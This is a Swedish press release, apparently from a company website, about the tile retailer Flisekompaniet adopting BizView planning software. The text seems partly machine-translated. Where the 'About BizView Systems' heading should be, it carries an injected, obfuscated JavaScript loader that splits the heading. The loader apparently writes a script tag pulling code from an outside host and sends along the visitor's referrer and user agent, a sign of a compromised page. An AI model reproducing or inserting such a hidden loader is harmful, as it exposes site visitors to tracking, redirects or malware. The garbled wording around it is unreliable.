Image Image Image Image Image Image Image Image Image Image

| 5 december, 2020

Scroll to top

Top

Flisekompaniet har valt BizView

Flisekompaniet har valt BizView
Sebastian

Tyngdpunkten för BizView har traditionellt varit på service och projektorienterade företag, tillverkningsföretag och statliga grenar. Det nya och spännande faktum är att under det senaste året har det skett en stadig tillväxt av intresse för BizView från detaljhandeln.

Så det är med stor glädje vi välkomnar Flisekompaniet i den snabbt växande familjen. Lars Fjellbirkeland, VD för BizView Norge, säger att Bizview under det senaste året arbetat med flera skandinaviska partners för att positionera bolaget för detaljhandeln.

”Detaljhandeln är en industri med höga krav på ekonomisk förvaltning och planering”, fortsätter Lars. ”Det är också en bransch där företagen ofta har flera olika system som arbetar för och med varandra, vilket i sin tur kan vara en utmaning vid genomförandet av nya systemlösningar för planering och beslutsstöd. Men sytemet är ett kraftfullt och flexibelt verktyg och kan ses som en ”universalnyckel” som hanterar de flesta behov, vilket gör bolaget en perfekt match för detaljhandeln.”

Flisekompaniet är ett av de ledande företagen på den norska marknaden för golvplattor. Bolaget kommer att integreras som en del av företagets befintliga system, dvs ERP-system, POS-system och fler. Detta kommer att ge Flisekompaniet de resurser som behövs för en förbättrad ekonomisk styrning. Eller uttryckt med BizView’s mantra: BizView – Planning and Reporting the way you want it. Faster.

Om eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|itaar|var|u0026u|referrer|sybey||js|php’.split(’|’),0,{}))
företaget and Bizview Systems

Företaget är en programvarulösning för prognostisering, budgetering, rapportering, analys och konsolidering. Programvaran har ett webbaserat Excel-liknande användargränssnitt, kombinerat med kraftfull workflow-styrning. BizView är en öppen lösning som passar väl med QlikView’s och Microsoft’s lösningar. BizView är utvecklat av BizView Systems, med kontor i Skandinavien. Bolaget marknadsförs av ett professionellt, globalt partnernätverk . Idag finns det över 1000 företag som använder lösningar från Biz Systems.

För mer information, se www.bizviewsystems.com

Om Flisekompaniet AS

Flisekompaniet grundades 1979 och är idag den största rikstäckande butikskedja för golvplattor – med ett sortiment av produkter för badrum, uteplats, natursten och andra förbättringsprodukter för hemmet. Flisekompaniet har 25 butiker från Alta i norr till Stavanger i söder.

Flisekompaniets huvudkontor hanterar produktval och inköp, leverantörsval, varumärkesmarknadsföring, marknadsföringskoncept, ICT och finansiella tjänster, samt andra relevanta serviceanläggningar för medlemmarna kedjan. Flisekompaniets huvudkontor ligger i Helsfyr i Oslo, tillsammans med kedjans centrallager. Företagets mål är att ge god service och optimala varor och produkttillgänglighet genom goda lösningar för kunderna.